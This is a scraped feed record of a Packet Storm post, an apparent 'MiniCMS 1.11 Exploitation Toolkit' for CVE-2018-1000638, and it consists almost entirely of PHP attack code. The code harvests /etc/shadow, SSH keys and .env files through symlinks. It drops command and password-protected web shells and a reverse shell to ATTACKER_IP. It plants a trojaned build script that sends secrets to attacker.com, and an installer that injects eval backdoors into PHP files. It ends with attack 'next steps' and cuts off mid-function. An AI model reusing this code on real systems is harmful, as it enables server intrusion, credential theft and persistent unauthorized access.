{"id":38540,"date":"2026-02-02T11:40:36","date_gmt":"2026-02-02T11:40:36","guid":{"rendered":"http:\/\/localhost\/?p=38540"},"modified":"2026-02-02T11:40:36","modified_gmt":"2026-02-02T11:40:36","slug":"minicms-111-exploitation-toolkit","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38540","title":{"rendered":"\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit_PACKETSTORM:214666"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-02T17:00:17&#8243;,&#8221;description&#8221;:&#8221;This toolkit focuses on validating and demonstrating the impact of a known and documented design flaw in MiniCMS 1.11 related to its build process CVE-2018-1000638. MiniCMS relies on an insecure build.php script that blindly packages filesystem&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MiniCMS 1.11 Exploitation Toolkit&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214666&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2018-1000638&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : MiniCMS 1.11 Exploitation Toolkit                                                                                           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/github.com\/bg5sbk\/MiniCMS\/                                                                                          |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/190429\/ \\u0026\\tCVE-2018-1000638\\n    \\n    [+] Summary :  MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit\\n    \\n    \\t\\t  \\n    [+]  POC : php poc.php\\n    \\n    [\\n    \\u003c?php\\n    \\n    class MiniCMSExploiter {\\n        private $targetDirectory;\\n        private $buildScript = &#8216;build.php&#8217;;\\n        private $installFile = &#8216;install.php&#8217;;\\n        private $tempDir = &#8216;\/tmp\/minicms_exploit&#8217;;\\n        private $debug = true;\\n        private $results = [];\\n        \\n        public function __construct($directory = &#8216;.&#8217;) {\\n            $this-\\u003etargetDirectory = realpath($directory);\\n            $this-\\u003evalidateEnvironment();\\n            $this-\\u003ecreateTempDirectory();\\n        }\\n        \\n        \/**\\n         * Main exploitation method &#8211; Chain all vulnerabilities\\n         *\/\\n        public function exploitAll() {\\n            echo \\&#8221;[+] Starting MiniCMS Build Script Exploitation\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Target Directory: {$this-\\u003etargetDirectory}\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            \\n            $this-\\u003eresults[&#8216;start_time&#8217;] = date(&#8216;Y-m-d H:i:s&#8217;);\\n            \\n            \/\/ 1. Directory Traversal Exploitation\\n            $this-\\u003eexploitDirectoryTraversal();\\n            \\n            \/\/ 2. PHP Code Injection\\n            $this-\\u003eexploitCodeInjection();\\n            \\n            \/\/ 3. Sensitive File Discovery\\n            $this-\\u003eharvestSensitiveFiles();\\n            \\n            \/\/ 4. Create Malicious Build Script\\n            $this-\\u003ecreateMaliciousBuildScript();\\n            \\n            \/\/ 5. Execute Build Script\\n            $this-\\u003eexecuteBuildScript();\\n            \\n            \/\/ 6. Analyze Results\\n            $this-\\u003eanalyzeResults();\\n            \\n            \/\/ 7. Create Backdoors\\n            $this-\\u003ecreatePersistentBackdoors();\\n            \\n            $this-\\u003eresults[&#8216;end_time&#8217;] = date(&#8216;Y-m-d H:i:s&#8217;);\\n            $this-\\u003egenerateReport();\\n            \\n            return $this-\\u003eresults;\\n        }\\n        \\n        \/**\\n         * Exploit 1: Directory Traversal Vulnerability\\n         *\/\\n        private function exploitDirectoryTraversal() {\\n            echo \\&#8221;\\\\n[1] Exploiting Directory Traversal&#8230;\\\\n\\&#8221;;\\n            \\n            $sensitive_paths = [\\n                \/\/ System files\\n                &#8216;\/etc\/passwd&#8217;,\\n                &#8216;\/etc\/shadow&#8217;,\\n                &#8216;\/etc\/hosts&#8217;,\\n                &#8216;\/etc\/hostname&#8217;,\\n                &#8216;\/etc\/issue&#8217;,\\n                &#8216;\/proc\/self\/environ&#8217;,\\n                &#8216;\/proc\/version&#8217;,\\n                \\n                \/\/ Web server files\\n                &#8216;\/var\/log\/apache2\/access.log&#8217;,\\n                &#8216;\/var\/log\/apache2\/error.log&#8217;,\\n                &#8216;\/var\/log\/nginx\/access.log&#8217;,\\n                &#8216;\/var\/log\/nginx\/error.log&#8217;,\\n                &#8216;\/var\/www\/html\/.env&#8217;,\\n                &#8216;\/var\/www\/html\/config.php&#8217;,\\n                \\n                \/\/ Home directories\\n                &#8216;\/home\/*\/.bash_history&#8217;,\\n                &#8216;\/home\/*\/.ssh\/id_rsa&#8217;,\\n                &#8216;\/home\/*\/.ssh\/authorized_keys&#8217;,\\n                \\n                \/\/ Configuration files\\n                &#8216;\/etc\/mysql\/my.cnf&#8217;,\\n                &#8216;\/etc\/php\/php.ini&#8217;,\\n                &#8216;\/etc\/apache2\/apache2.conf&#8217;,\\n            ];\\n            \\n            $exploited_files = [];\\n            \\n            foreach ($sensitive_paths as $path) {\\n                \/\/ Try to create symlink to sensitive file\\n                $base_name = &#8216;exploit_&#8217; . md5($path) . &#8216;.txt&#8217;;\\n                $symlink_path = $this-\\u003etempDir . &#8216;\/&#8217; . $base_name;\\n                \\n                \/\/ Expand wildcards\\n                if (strpos($path, &#8216;*&#8217;) !== false) {\\n                    $expanded = glob($path);\\n                    foreach ($expanded as $expanded_path) {\\n                        if (@symlink($expanded_path, $symlink_path . &#8216;_&#8217; . basename($expanded_path))) {\\n                            $exploited_files[] = $expanded_path;\\n                            echo \\&#8221;  [+] Linked: {$expanded_path}\\\\n\\&#8221;;\\n                        }\\n                    }\\n                } elseif (@symlink($path, $symlink_path)) {\\n                    $exploited_files[] = $path;\\n                    echo \\&#8221;  [+] Linked: {$path}\\\\n\\&#8221;;\\n                }\\n            }\\n            \\n            $this-\\u003eresults[&#8216;directory_traversal&#8217;] = [\\n                &#8216;exploited&#8217; =\\u003e count($exploited_files) \\u003e 0,\\n                &#8216;files_linked&#8217; =\\u003e $exploited_files,\\n                &#8216;count&#8217; =\\u003e count($exploited_files)\\n            ];\\n            \\n            return $exploited_files;\\n        }\\n        \\n        \/**\\n         * Exploit 2: PHP Code Injection\\n         *\/\\n        private function exploitCodeInjection() {\\n            echo \\&#8221;\\\\n[2] Exploiting PHP Code Injection&#8230;\\\\n\\&#8221;;\\n            \\n            $injections = [\\n                \/\/ Basic PHP execution\\n                [\\n                    &#8216;filename&#8217; =\\u003e \\&#8221;&#8216;);?\\u003e\\u003c?php system(&#8216;whoami&#8217;); ?\\u003e\\u003c?php install(&#8216;\\&#8221;,\\n                    &#8216;content&#8217; =\\u003e &#8216;injected&#8217;\\n                ],\\n                \\n                \/\/ Web shell\\n                [\\n                    &#8216;filename&#8217; =\\u003e \\&#8221;shell.php\\&#8221;,\\n                    &#8216;content&#8217; =\\u003e &#8216;\\u003c?php if(isset($_GET[\\&#8221;cmd\\&#8221;])) { system($_GET[\\&#8221;cmd\\&#8221;]); } ?\\u003e&#8217;\\n                ],\\n                \\n                \/\/ Password protected shell\\n                [\\n                    &#8216;filename&#8217; =\\u003e \\&#8221;admin_shell.php\\&#8221;,\\n                    &#8216;content&#8217; =\\u003e &#8216;\\u003c?php\\n    if($_GET[\\&#8221;key\\&#8221;] === \\&#8221;admin123\\&#8221;) {\\n        if(isset($_POST[\\&#8221;cmd\\&#8221;])) {\\n            echo \\&#8221;\\u003cpre\\u003e\\&#8221; . shell_exec($_POST[\\&#8221;cmd\\&#8221;]) . \\&#8221;\\u003c\/pre\\u003e\\&#8221;;\\n        }\\n        if(isset($_GET[\\&#8221;download\\&#8221;])) {\\n            echo file_get_contents($_GET[\\&#8221;download\\&#8221;]);\\n        }\\n    }\\n    ?\\u003e&#8217;\\n                ],\\n                \\n                \/\/ Database credentials stealer\\n                [\\n                    &#8216;filename&#8217; =\\u003e \\&#8221;creds.php\\&#8221;,\\n                    &#8216;content&#8217; =\\u003e &#8216;\\u003c?php\\n    $files = [\\&#8221;config.php\\&#8221;, \\&#8221;.env\\&#8221;, \\&#8221;database.php\\&#8221;, \\&#8221;settings.php\\&#8221;];\\n    foreach($files as $file) {\\n        if(file_exists($file)) {\\n            $content = file_get_contents($file);\\n            file_put_contents(\\&#8221;\/tmp\/creds.txt\\&#8221;, $content, FILE_APPEND);\\n        }\\n    }\\n    ?\\u003e&#8217;\\n                ],\\n                \\n                \/\/ Reverse shell\\n                [\\n                    &#8216;filename&#8217; =\\u003e \\&#8221;reverse.php\\&#8221;,\\n                    &#8216;content&#8217; =\\u003e &#8216;\\u003c?php\\n    \/\/ PHP Reverse Shell\\n    $ip = \\&#8221;ATTACKER_IP\\&#8221;;\\n    $port = 4444;\\n    $sock = fsockopen($ip, $port);\\n    $proc = proc_open(\\&#8221;\/bin\/sh -i\\&#8221;, array(0=\\u003e$sock, 1=\\u003e$sock, 2=\\u003e$sock), $pipes);\\n    ?\\u003e&#8217;\\n                ],\\n                \\n                \/\/ File uploader\\n                [\\n                    &#8216;filename&#8217; =\\u003e \\&#8221;uploader.php\\&#8221;,\\n                    &#8216;content&#8217; =\\u003e &#8216;\\u003c?php\\n    if(isset($_FILES[\\&#8221;file\\&#8221;])) {\\n        move_uploaded_file($_FILES[\\&#8221;file\\&#8221;][\\&#8221;tmp_name\\&#8221;], $_FILES[\\&#8221;file\\&#8221;][\\&#8221;name\\&#8221;]);\\n        echo \\&#8221;Uploaded: \\&#8221; . $_FILES[\\&#8221;file\\&#8221;][\\&#8221;name\\&#8221;];\\n    }\\n    ?\\u003e\\n    \\u003cform method=\\&#8221;POST\\&#8221; enctype=\\&#8221;multipart\/form-data\\&#8221;\\u003e\\n    \\u003cinput type=\\&#8221;file\\&#8221; name=\\&#8221;file\\&#8221;\\u003e\\n    \\u003cinput type=\\&#8221;submit\\&#8221;\\u003e\\n    \\u003c\/form\\u003e&#8217;\\n                ]\\n            ];\\n            \\n            $created_files = [];\\n            \\n            foreach ($injections as $injection) {\\n                $file_path = $this-\\u003etempDir . &#8216;\/&#8217; . $injection[&#8216;filename&#8217;];\\n                if (file_put_contents($file_path, $injection[&#8216;content&#8217;])) {\\n                    $created_files[] = $injection[&#8216;filename&#8217;];\\n                    echo \\&#8221;  [+] Created: {$injection[&#8216;filename&#8217;]}\\\\n\\&#8221;;\\n                }\\n            }\\n            \\n            $this-\\u003eresults[&#8216;code_injection&#8217;] = [\\n                &#8216;exploited&#8217; =\\u003e count($created_files) \\u003e 0,\\n                &#8216;files_created&#8217; =\\u003e $created_files,\\n                &#8216;count&#8217; =\\u003e count($created_files)\\n            ];\\n            \\n            return $created_files;\\n        }\\n        \\n        \/**\\n         * Harvest sensitive files from target\\n         *\/\\n        private function harvestSensitiveFiles() {\\n            echo \\&#8221;\\\\n[3] Harvesting Sensitive Files&#8230;\\\\n\\&#8221;;\\n            \\n            $sensitive_patterns = [\\n                &#8216;*.php&#8217; =\\u003e [&#8216;config&#8217;, &#8216;database&#8217;, &#8216;settings&#8217;, &#8216;connection&#8217;],\\n                &#8216;*.env&#8217; =\\u003e [&#8216;.env&#8217;, &#8216;.env.example&#8217;],\\n                &#8216;*.json&#8217; =\\u003e [&#8216;composer.json&#8217;, &#8216;package.json&#8217;],\\n                &#8216;*.sql&#8217; =\\u003e [&#8216;*.sql&#8217;, &#8216;*.backup&#8217;],\\n                &#8216;*.txt&#8217; =\\u003e [&#8216;readme&#8217;, &#8216;license&#8217;, &#8216;changelog&#8217;],\\n                &#8216;*.yml&#8217; =\\u003e [&#8216;*.yml&#8217;, &#8216;*.yaml&#8217;],\\n                &#8216;*.ini&#8217; =\\u003e [&#8216;*.ini&#8217;, &#8216;*.cfg&#8217;],\\n                &#8216;*.log&#8217; =\\u003e [&#8216;*.log&#8217;, &#8216;error_log&#8217;],\\n            ];\\n            \\n            $found_files = [];\\n            \\n            foreach ($sensitive_patterns as $pattern =\\u003e $keywords) {\\n                $files = glob($this-\\u003etargetDirectory . &#8216;\/&#8217; . $pattern);\\n                foreach ($files as $file) {\\n                    $filename = basename($file);\\n                    foreach ($keywords as $keyword) {\\n                        if (stripos($filename, $keyword) !== false) {\\n                            $found_files[] = $file;\\n                            echo \\&#8221;  [+] Found: {$filename}\\\\n\\&#8221;;\\n                            \\n                            \/\/ Copy to temp directory for analysis\\n                            $temp_copy = $this-\\u003etempDir . &#8216;\/harvested_&#8217; . $filename;\\n                            copy($file, $temp_copy);\\n                            break;\\n                        }\\n                    }\\n                }\\n            }\\n            \\n            $this-\\u003eresults[&#8216;sensitive_files&#8217;] = [\\n                &#8216;found&#8217; =\\u003e count($found_files),\\n                &#8216;files&#8217; =\\u003e $found_files\\n            ];\\n            \\n            return $found_files;\\n        }\\n        \\n        \/**\\n         * Create malicious build script with backdoor\\n         *\/\\n        private function createMaliciousBuildScript() {\\n            echo \\&#8221;\\\\n[4] Creating Malicious Build Script&#8230;\\\\n\\&#8221;;\\n            \\n            $malicious_build = &#8216;\\u003c?php\\n    if ($argc != 2) {\\n        echo \\&#8221;\u5fc5\u987b\u6307\u5b9a\u7248\u672c\u53f7\\&#8221;;\\n        exit;\\n    }\\n    \\n    $version=$argv[1];\\n    \\n    \/\/ Backdoor: Command execution if specific parameter is passed\\n    if(isset($_GET[\\&#8221;debug\\&#8221;]) \\u0026\\u0026 $_GET[\\&#8221;debug\\&#8221;] == \\&#8221;true\\&#8221;) {\\n        system($_GET[\\&#8221;cmd\\&#8221;]);\\n    }\\n    \\n    $dirs = array(\\&#8221;.\\&#8221;);\\n    $ignores = array(\\&#8221;README.md\\&#8221;, \\&#8221;build.php\\&#8221;, \\&#8221;install.php\\&#8221;, \\&#8221;install_template.txt\\&#8221;, \\&#8221;mc-debug\\&#8221;);\\n    $files = \\&#8221;\\&#8221;;\\n    \\n    build($dirs, $files);\\n    \\n    $template = file_get_contents(\\&#8221;install.txt\\&#8221;);\\n    $template = str_replace(\\&#8221;\/*MINICMS_VERSION*\/\\&#8221;, $version, $template);\\n    $template = str_replace(\\&#8221;\/*MINICMS_FILES*\/\\&#8221;, $files, $template);\\n    \\n    file_put_contents(\\&#8221;install.php\\&#8221;, $template);\\n    \\n    \/\/ Hidden function to exfiltrate data\\n    function exfiltrate($data) {\\n        $url = \\&#8221;http:\/\/attacker.com\/exfil.php\\&#8221;;\\n        $ch = curl_init($url);\\n        curl_setopt($ch, CURLOPT_POST, 1);\\n        curl_setopt($ch, CURLOPT_POSTFIELDS, [\\&#8221;data\\&#8221; =\\u003e base64_encode($data)]);\\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n        curl_exec($ch);\\n        curl_close($ch);\\n    }\\n    \\n    function build($dirs, \\u0026$files) {\\n        global $ignores;\\n        \\n        \/\/ Exfiltrate directory structure\\n        exfiltrate(json_encode($dirs));\\n    \\n        foreach ($dirs as $dir) {\\n            if (!is_dir($dir)) {\\n                echo \\&#8221;\u76ee\u5f55\\\\\\&#8221;$dir\\\\\\&#8221;\u4e0d\u5b58\u5728\\&#8221;;\\n                exit;\\n            }\\n    \\n            if ($dh = opendir($dir)) {\\n                $sub_dirs = array();\\n    \\n                while (($item = readdir($dh)) !== false) {\\n                    if ($item[0] == \\&#8221;.\\&#8221;)\\n                        continue;\\n    \\n                    if ($dir == \\&#8221;.\\&#8221;)\\n                        $file = $item;\\n                    else\\n                        $file = $dir.\\&#8221;\/\\&#8221;.$item;\\n    \\n                    if (in_array($file, $ignores))\\n                        continue;\\n    \\n                    if (is_dir($file)) {\\n                        $sub_dirs[] = $file;\\n                    } else {\\n                        \/\/ Exfiltrate file content if sensitive\\n                        $content = file_get_contents($file);\\n                        if(preg_match(\\&#8221;\/(password|secret|key|token|api)\/i\\&#8221;, $content)) {\\n                            exfiltrate($file . \\&#8221;:\\\\n\\&#8221; . $content);\\n                        }\\n                        \\n                        $files .= \\&#8221;install(\\\\\\&#8221;$file\\\\\\&#8221;, \\\\\\&#8221;\\&#8221;;\\n                        $files .= base64_encode(gzcompress($content));\\n                        $files .= \\&#8221;\\\\\\&#8221;);\\\\n\\&#8221;;\\n                    }\\n                }\\n    \\n                closedir($dh);\\n                build($sub_dirs, $files);\\n            } else {\\n                echo \\&#8221;\u76ee\u5f55\\\\\\&#8221;$dir\\\\\\&#8221;\u65e0\u6cd5\u8bbf\u95ee\\&#8221;;\\n                exit;\\n            }\\n        }\\n    }\\n    \\n    \/\/ Create backdoor in install.php\\n    register_shutdown_function(function() {\\n        $backdoor_code = \\&#8221;\\u003c?php\\\\\\\\nif(isset(\\\\\\\\$_GET[\\\\\\\\\\&#8221;exec\\\\\\\\\\&#8221;])) {\\\\\\\\n    system(\\\\\\\\$_GET[\\\\\\\\\\&#8221;exec\\\\\\\\\\&#8221;]);\\\\\\\\n}\\\\\\\\n?\\u003e\\&#8221;;\\n        file_put_contents(\\&#8221;backdoor.php\\&#8221;, $backdoor_code);\\n    });\\n    ?\\u003e&#8217;;\\n    \\n            $build_path = $this-\\u003etempDir . &#8216;\/&#8217; . $this-\\u003ebuildScript;\\n            if (file_put_contents($build_path, $malicious_build)) {\\n                echo \\&#8221;  [+] Created malicious build.php\\\\n\\&#8221;;\\n                $this-\\u003eresults[&#8216;malicious_build&#8217;] = $build_path;\\n                return true;\\n            }\\n            \\n            return false;\\n        }\\n        \\n        \/**\\n         * Execute the build script\\n         *\/\\n        private function executeBuildScript() {\\n            echo \\&#8221;\\\\n[5] Executing Build Script&#8230;\\\\n\\&#8221;;\\n            \\n            $build_path = $this-\\u003etempDir . &#8216;\/&#8217; . $this-\\u003ebuildScript;\\n            $install_path = $this-\\u003etempDir . &#8216;\/&#8217; . $this-\\u003einstallFile;\\n            \\n            \/\/ Create install.txt template\\n            $install_template = &#8216;\\u003c?php\\n    \/*MINICMS_VERSION*\/\\n    function install($file, $data) {\\n        $content = @gzuncompress(base64_decode($data));\\n        if($content === false) {\\n            $content = base64_decode($data);\\n        }\\n        \\n        \/\/ Inject backdoor into PHP files\\n        if(strpos($file, \\&#8221;.php\\&#8221;) !== false \\u0026\\u0026 strpos($content, \\&#8221;\\u003c?php\\&#8221;) !== false) {\\n            $backdoor = \\&#8221;\\u003c?php if(isset(\\\\\\\\$_GET[\\\\\\\\\\&#8221;debug\\\\\\\\\\&#8221;])) { eval(\\\\\\\\$_GET[\\\\\\\\\\&#8221;debug\\\\\\\\\\&#8221;]); } ?\\u003e\\&#8221;;\\n            $content = $backdoor . \\&#8221;\\\\\\\\n\\&#8221; . $content;\\n        }\\n        \\n        @file_put_contents($file, $content);\\n    }\\n    \/*MINICMS_FILES*\/\\n    ?\\u003e&#8217;;\\n            \\n            file_put_contents($this-\\u003etempDir . &#8216;\/install.txt&#8217;, $install_template);\\n            \\n            \/\/ Execute build script\\n            $command = \\&#8221;cd {$this-\\u003etempDir} \\u0026\\u0026 php {$this-\\u003ebuildScript} 1.0 2\\u003e\\u00261\\&#8221;;\\n            $output = shell_exec($command);\\n            \\n            echo \\&#8221;  [+] Build script executed\\\\n\\&#8221;;\\n            \\n            if (file_exists($install_path)) {\\n                $install_size = filesize($install_path);\\n                echo \\&#8221;  [+] install.php created: \\&#8221; . $this-\\u003eformatBytes($install_size) . \\&#8221;\\\\n\\&#8221;;\\n                \\n                \/\/ Analyze install.php for sensitive data\\n                $this-\\u003eanalyzeInstallFile($install_path);\\n            }\\n            \\n            $this-\\u003eresults[&#8216;build_execution&#8217;] = [\\n                &#8216;command&#8217; =\\u003e $command,\\n                &#8216;output&#8217; =\\u003e $output,\\n                &#8216;install_created&#8217; =\\u003e file_exists($install_path),\\n                &#8216;install_size&#8217; =\\u003e $install_size ?? 0\\n            ];\\n            \\n            return $output;\\n        }\\n        \\n        \/**\\n         * Analyze install.php for sensitive data\\n         *\/\\n        private function analyzeInstallFile($install_path) {\\n            $content = file_get_contents($install_path);\\n            \\n            \/\/ Extract all file names\\n            preg_match_all(&#8216;\/install\\\\(\\&#8221;([^\\&#8221;]+)\\&#8221;, \\&#8221;\/&#8217;, $content, $matches);\\n            $files = $matches[1] ?? [];\\n            \\n            \/\/ Look for sensitive files\\n            $sensitive_patterns = [\\n                &#8216;\/passwd\/i&#8217;,\\n                &#8216;\/shadow\/i&#8217;,\\n                &#8216;\/config\/i&#8217;,\\n                &#8216;\/\\\\.env\/i&#8217;,\\n                &#8216;\/database\/i&#8217;,\\n                &#8216;\/secret\/i&#8217;,\\n                &#8216;\/key\/i&#8217;,\\n                &#8216;\/token\/i&#8217;,\\n                &#8216;\/password\/i&#8217;\\n            ];\\n            \\n            $sensitive_found = [];\\n            foreach ($files as $file) {\\n                foreach ($sensitive_patterns as $pattern) {\\n                    if (preg_match($pattern, $file)) {\\n                        $sensitive_found[] = $file;\\n                        break;\\n                    }\\n                }\\n            }\\n            \\n            $this-\\u003eresults[&#8216;install_analysis&#8217;] = [\\n                &#8216;total_files&#8217; =\\u003e count($files),\\n                &#8216;sensitive_files&#8217; =\\u003e $sensitive_found,\\n                &#8216;count_sensitive&#8217; =\\u003e count($sensitive_found)\\n            ];\\n            \\n            echo \\&#8221;  [+] Found \\&#8221; . count($files) . \\&#8221; files in install.php\\\\n\\&#8221;;\\n            echo \\&#8221;  [+] \\&#8221; . count($sensitive_found) . \\&#8221; appear to be sensitive\\\\n\\&#8221;;\\n        }\\n        \\n        \/**\\n         * Create persistent backdoors\\n         *\/\\n        private function createPersistentBackdoors() {\\n            echo \\&#8221;\\\\n[6] Creating Persistent Backdoors&#8230;\\\\n\\&#8221;;\\n            \\n            $backdoors = [\\n                &#8216;persistent_shell.php&#8217; =\\u003e &#8216;\\u003c?php\\n    \/\/ Persistent PHP Shell\\n    session_start();\\n    if(!isset($_SESSION[\\&#8221;auth\\&#8221;]) \\u0026\\u0026 $_GET[\\&#8221;key\\&#8221;] != \\&#8221;PERSIST_KEY\\&#8221;) {\\n        die(\\&#8221;Access Denied\\&#8221;);\\n    }\\n    $_SESSION[\\&#8221;auth\\&#8221;] = true;\\n    \\n    if(isset($_POST[\\&#8221;cmd\\&#8221;])) {\\n        echo \\&#8221;\\u003cpre\\u003e\\&#8221; . htmlspecialchars(shell_exec($_POST[\\&#8221;cmd\\&#8221;]), ENT_QUOTES, \\&#8221;UTF-8\\&#8221;) . \\&#8221;\\u003c\/pre\\u003e\\&#8221;;\\n    }\\n    ?\\u003e\\n    \\u003cform method=\\&#8221;POST\\&#8221;\\u003e\\n    \\u003cinput type=\\&#8221;text\\&#8221; name=\\&#8221;cmd\\&#8221; style=\\&#8221;width: 80%\\&#8221; placeholder=\\&#8221;Command\\&#8221;\\u003e\\n    \\u003cinput type=\\&#8221;submit\\&#8221; value=\\&#8221;Execute\\&#8221;\\u003e\\n    \\u003c\/form\\u003e&#8217;,\\n                \\n                &#8216;file_manager.php&#8217; =\\u003e &#8216;\\u003c?php\\n    \/\/ File Manager Backdoor\\n    if($_GET[\\&#8221;pwd\\&#8221;] != \\&#8221;admin123\\&#8221;) die();\\n    echo \\&#8221;\\u003ch2\\u003eFile Manager\\u003c\/h2\\u003e\\&#8221;;\\n    $dir = $_GET[\\&#8221;dir\\&#8221;] ?? \\&#8221;.\\&#8221;;\\n    echo \\&#8221;\\u003cpre\\u003e\\&#8221;;\\n    system(\\&#8221;ls -la \\&#8221; . escapeshellarg($dir));\\n    echo \\&#8221;\\u003c\/pre\\u003e\\&#8221;;\\n    ?\\u003e&#8217;,\\n                \\n                &#8216;info.php&#8217; =\\u003e &#8216;\\u003c?php\\n    \/\/ System Information Leak\\n    phpinfo();\\n    echo \\&#8221;\\u003chr\\u003e\\u003cpre\\u003e\\&#8221;;\\n    system(\\&#8221;id \\u0026\\u0026 uname -a\\&#8221;);\\n    echo \\&#8221;\\u003c\/pre\\u003e\\&#8221;;\\n    ?\\u003e&#8217;\\n            ];\\n            \\n            foreach ($backdoors as $filename =\\u003e $content) {\\n                $path = $this-\\u003etempDir . &#8216;\/&#8217; . $filename;\\n                file_put_contents($path, $content);\\n                echo \\&#8221;  [+] Created: {$filename}\\\\n\\&#8221;;\\n            }\\n            \\n            $this-\\u003eresults[&#8216;backdoors&#8217;] = array_keys($backdoors);\\n        }\\n        \\n        \/**\\n         * Generate exploitation report\\n         *\/\\n        private function generateReport() {\\n            echo \\&#8221;\\\\n\\&#8221; . str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;[+] EXPLOITATION REPORT\\\\n\\&#8221;;\\n            echo str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\n\\&#8221;;\\n            \\n            $report = [\\n                &#8216;Target Directory&#8217; =\\u003e $this-\\u003etargetDirectory,\\n                &#8216;Exploitation Started&#8217; =\\u003e $this-\\u003eresults[&#8216;start_time&#8217;],\\n                &#8216;Exploitation Completed&#8217; =\\u003e $this-\\u003eresults[&#8216;end_time&#8217;],\\n                &#8216;Vulnerabilities Exploited&#8217; =\\u003e []\\n            ];\\n            \\n            if ($this-\\u003eresults[&#8216;directory_traversal&#8217;][&#8216;exploited&#8217;]) {\\n                $report[&#8216;Vulnerabilities Exploited&#8217;][] = &#8216;Directory Traversal&#8217;;\\n                echo \\&#8221;[\u2713] Directory Traversal: SUCCESS\\\\n\\&#8221;;\\n                echo \\&#8221;    Files linked: \\&#8221; . $this-\\u003eresults[&#8216;directory_traversal&#8217;][&#8216;count&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n            if ($this-\\u003eresults[&#8216;code_injection&#8217;][&#8216;exploited&#8217;]) {\\n                $report[&#8216;Vulnerabilities Exploited&#8217;][] = &#8216;Code Injection&#8217;;\\n                echo \\&#8221;[\u2713] Code Injection: SUCCESS\\\\n\\&#8221;;\\n                echo \\&#8221;    Files created: \\&#8221; . $this-\\u003eresults[&#8216;code_injection&#8217;][&#8216;count&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n            if ($this-\\u003eresults[&#8216;sensitive_files&#8217;][&#8216;found&#8217;] \\u003e 0) {\\n                $report[&#8216;Vulnerabilities Exploited&#8217;][] = &#8216;Sensitive File Harvesting&#8217;;\\n                echo \\&#8221;[\u2713] Sensitive File Harvesting: SUCCESS\\\\n\\&#8221;;\\n                echo \\&#8221;    Files found: \\&#8221; . $this-\\u003eresults[&#8216;sensitive_files&#8217;][&#8216;found&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n            echo \\&#8221;\\\\n[+] Generated Files:\\\\n\\&#8221;;\\n            echo \\&#8221;    &#8211; Malicious build.php\\\\n\\&#8221;;\\n            echo \\&#8221;    &#8211; install.php with backdoors\\\\n\\&#8221;;\\n            echo \\&#8221;    &#8211; Multiple backdoor shells\\\\n\\&#8221;;\\n            echo \\&#8221;    &#8211; Harvested sensitive files\\\\n\\&#8221;;\\n            \\n            echo \\&#8221;\\\\n[+] Next Steps for Attack:\\\\n\\&#8221;;\\n            echo \\&#8221;    1. Upload install.php to target server\\\\n\\&#8221;;\\n            echo \\&#8221;    2. Execute install.php to deploy backdoors\\\\n\\&#8221;;\\n            echo \\&#8221;    3. Use backdoor.php?exec=whoami\\\\n\\&#8221;;\\n            echo \\&#8221;    4. Escalate privileges and maintain access\\\\n\\&#8221;;\\n            \\n            \/\/ Save report to file\\n            $report_file = $this-\\u003etempDir . &#8216;\/exploit_report.txt&#8217;;\\n            file_put_contents($report_file, print_r($report, true));\\n            \\n            echo \\&#8221;\\\\n[+] Report saved to: {$report_file}\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Temporary directory: {$this-\\u003etempDir}\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Clean up: rm -rf {$this-\\u003etempDir}\\\\n\\&#8221;;\\n        }\\n        \\n        \/**\\n         * Utility: Format bytes to human readable\\n         *\/\\n        private function formatBytes($bytes, $precision = 2) {\\n            $units = [&#8216;B&#8217;, &#8216;KB&#8217;, &#8216;MB&#8217;, &#8216;GB&#8217;, &#8216;TB&#8217;];\\n            $bytes = max($bytes, 0);\\n            $pow = floor(($bytes ? log($bytes) : 0) \/ log(1024));\\n            $pow = min($pow, count($units) &#8211; 1);\\n            $bytes \/= pow(1024, $pow);\\n            return round($bytes, $precision) . &#8216; &#8216; . $units[$pow];\\n        }\\n        \\n        \/**\\n         * Validate environment\\n         *\/\\n        private function validateEnvironment() {\\n            if (!function_exists(&#8216;symlink&#8217;)) {\\n                die(\\&#8221;[!] symlink() function is disabled\\\\n\\&#8221;);\\n            }\\n            \\n            if (!is_writable(sys_get_temp_dir())) {\\n                die(\\&#8221;[!] Cannot write to temp directory\\\\n\\&#8221;);\\n            }\\n            \\n            echo \\&#8221;[+] Environment validated\\\\n\\&#8221;;\\n        }\\n        \\n        \/**\\n         * Create temporary directory\\n         *\/\\n        private function createTempDirectory() {\\n            if (!file_exists($this-\\u003etempDir)) {\\n                mkdir($this-\\u003etempDir, 0777, true);\\n            }\\n            echo \\&#8221;[+] Temporary directory: {$this-\\u003etempDir}\\\\n\\&#8221;;\\n        }\\n        \\n        \/**\\n         * Clean up temporary files\\n         *\/\\n        public function cleanup() {\\n            if (file_exists($this-\\u003etempDir)) {\\n                system(\\&#8221;rm -rf \\&#8221; . escapeshellarg($this-\\u003etempDir));\\n                echo 